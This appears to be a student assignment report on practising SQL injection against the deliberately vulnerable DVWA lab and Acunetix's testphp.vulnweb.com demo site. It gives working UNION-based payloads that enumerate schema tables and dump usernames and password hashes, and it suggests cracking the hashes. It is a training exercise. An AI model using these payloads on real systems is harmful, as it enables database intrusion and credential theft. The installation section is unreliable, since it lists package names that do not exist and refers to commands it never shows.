ASSIGNMENT-4

SQL INJECTION ON DVWA AND ACUNTEIX

ASSESSMENT REPORT

BY: - S VENKATESH REDDY

TARGET: - DVWA & AUCNTEIX

 BRIEFCONTENTS

1 Introduction
2 Installation
3 Setup DVWA for SQL Injection
1 What is SQL Injection

A SQL injection attack consists of the “insertion/injection” of a SQL query via the
input data from the client to the application. A successful SQL injection exploit —
can read/modify(Insert/Update/Delete) sensitive data from the database, execute
administration operations(such as shutdown the DBMS), recover the content of a
given file present on the DBMS file system, and in some cases issue commands to the
operating system.
SQL injection attacks — in which SQL commands are injected into data-plane input in order to affect
the execution of predefined SQL commands. — OWASP.

Verizon Attack Vector Summary – confirmed breaches (percent of total records stolen)
2 Download Damn Vulnerable Web Application (DVWA)

To get started, we will need to clone the DVWA GitHub into our /var/www/html directory. That is
the location where Localhost files are stored in Linux systems. Launch the Terminal and change our
directory to the /var/www/html directory with the command below. In this we have done check with
version of php required.
The following command lists all PHP-related packages that exist on the current system, and saves
them to a text file named packages.txt. This helps to reconstruct the same list of packages on PHP
8.2.

2.1 Add ondrej/php PPA as a software repository.

The repositories maintained by Ondřej Surý contain the main PHP packages, and are kept updated.
After this repository is added to the system's list of software sources, the initial installation and
updates can be done with the standard apt commands.
Creating php.list file for latest versions for creating server
2.2 Updating kali linux OS and installed packages to compile the installed packages need to be up
and running and kernel OS will be cloned as latest version of kali.org repo lists.

2.3. Install PHP 8.2 and extensions

All PHP 8.2 packages available in the repository added in step #2 follow php8.2- naming pattern.
Bundled extensions in PHP, such as json, ctype, date, random, etc do not need to be installed
manually. The php8.2-common package includes several common PHP packages. It is possible to
selectively disable unnecessary extensions later.
2.4. Install and enable server APIs
On a system that a web server integrates with PHP, install the additional Server API packages. The
following are some examples on most popular combinations:
2.5 Configure Apache Server
Now, we need to configure the server. Use the command below to change your location on the
Terminal to point to /etc/php/8.2/apache2 directory.

In the /etc/php/8.2/apache2, when you execute the ls command, you will see a file called php.ini.
That is the file we will edit to configure our localhost server. Use the command below to open it
using the nano editor.

sudo nano php.ini

Scroll down and look for these two lines: allow_url_fopen and allow_url_include. Set them both as
On. Save the file (Ctrl + O, then Enter) and Exit (Ctrl + X).
 Start Apache server using the command below:

sudo service apache2 start

To check whether the service started successfully, use the status command.

systemctl status apache2

Installation of Dependencies of DVWA webserver

This command will install the following modules:

 php8.2-cli - command interpreter, useful for testing PHP scripts from a shell or performing general
shell scripting tasks
 php8.2-common - documentation, examples, and common modules for PHP
 php8.2-mariadb-server- for working with MySQL databases
 php8.2-apache2 – running apache server for gui
 php8.2-libapache2-mod-php - for working with images
 php8.2-nginx - used to manage redirecting which is in js and css
 php8.2-curl - lets you make HTTP requests in PHP
 php8.2-xml - for working with XML data
 php8.2-bcmath - used when working with precision floats

Below are the dependencies

Then after installation all dependencies then we need to start dvwa service as shown below

3. Setup DVWA for SQL Injection

Damn Vulnerable Web App works using PHP/MySQL web applications that have been engineered
to be deliberately vulnerable to a great variety of attack vectors for the purpose of allowing security
professionals to test their skills and tools in a legal environment. It’s a very useful tool when learning
and applying the techniques to security testing applications when using an SDLC.
Go to SQL injection section for getting access for databases which is a vulnerable which connects to Mysql
server and bypassing the authenticating for extracting data from db
On the User ID field, enter “1” and click Submit. That is supposed to print the ID, First_name,
and Surname on the screen as you can see below.

The SQL syntax being exploited here is:

Interestingly, when you check the URL, you will see there is an injectable parameter which is the
ID. Currently, my URL looks like this:

http://127.0.0.1:42001/vulnerabilities/sqli/?id=4&Submit=Submit&user_token=eb6d5cfd46b2f90034ccc829
2da1ac09#
Due to security level is impossible we coudnt perform any injection attacks on search We need to
keep it low for getting sql injection attack works
Step 3: Always True Scenario
An advanced method to extract all the First_names and Surnames from the database would be
to use the input: %' or '1'='1'
Step 4: Display Database Version
To know the database version the DVWA application is running on, enter the text below in the
User ID field.
Step 5: Display Database User
To display the Database user who executed the PHP code powering the database, enter the text
below in the USER ID field.

Step 6: Display Database Name

To display the database name, we will inject the SQL code below in the User ID field.

%' or 0=0 union select null, user() #

Step 7: Display all tables in information_schema
The Information Schema stores information about tables, columns, and all the other databases
maintained by MySQL. To display all the tables present in the information_schema, use the text
below.

%' and 1=0 union select null, table_name from information_schema.tables #

Step 8: Display all the user tables in information_schema
For this step, we will print all the tables that start with the prefix user as stored in the
information_schema. Enter the SQL code below in the User ID.

%' and 1=0 union select null, table_name from information_schema.tables where
table_name like 'user%'#
Step 9: Display all the columns fields in the
information_schema user table
We will print all the columns present in the users’ table. This information will include column
information like User_ID, first_name, last_name, user, and password. Enter the input in the
User_ID field.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns

where table_name = 'users' #
Step 10: Display Column field contents
To display all the necessary authentication information present in the columns as stored in the
information_schema, use the SQL syntax below:

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

From the image above, you can see the password was returned in its hashed format. To extract
the password, copy the MD5 hash and use applications like John the Ripper to crack it. There
are also sites available on the internet where you can paste the hash and if lucky, you will be
able to extract the password.

Conclusion

From the various examples listed in this article, SQL injection proves to be a critical vulnerability
that can exist in a system. Not only can attackers exploit it to reveal user or customer
information, but it can also be used to corrupt the entire database thus bringing the whole
system down. As of writing this post (2021), Injection is listed as the number one vulnerability in
the OWASP Top 10 Vulnerabilities summary. The DVWA acts as a reliable resource for both
penetration testers who want to improve their skills and web developers who want to develop
systems with security in mind.

Acunetix SQL Injection

Types of SQLi:

1. UNION Based SQLi

2. Error Based SQLi

3. Blind SQLi
i) Time based SQLi
ii) Boolean based SQLi

UNION Based SQL Injections

In Union Based SQL Injections, we try to modify the existing SQL Query, in order to retrieve
sensitive information from the database.

We will be testing for SQLi’s on a vulnerable demo site by Acunetix: http://testphp.vulnweb.com.

Try inserting a quote in the parameter cat.

2. Let’s try inserting an always true condition as ‘+OR+1=1 -- or ‘ OR 1=1 --in the parameter cat.
Look if we can get anything interesting.

3. But here, as we don’t know the table_names, we will start by guessing the number of columns in
the database. Use query order by 10--. Depending on the quote used in the DB, modify the request
accordingly. Here, we are not getting any error, this confirms that at least 10 columns exist.

http://testphp.vulnweb.com/listproducts.php?cat=1 order by 10--.

5. Now, we know that number of columns in the DB is 11. We will look for the
vulnerable columns that can be read. Use the query union select 1,2,3,4,5,6,7,8,9,10,11--. This will
retrieve the details from the vulnerable columns.
Refer to the image below, we got numbers: 2, 7 & 9. Thus, column 2, 7 & 9 are vulnerable to SQLi.

http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11--
6. Finally, we got the table_name & column_name. Time to dump the credentials. Use query union
select 1,uname,3,4,5,6,pass,8,9,10,11 from users --. As value 7 is also vulnerable, we can retrieve
details over there. Scroll down to bottom to view the results.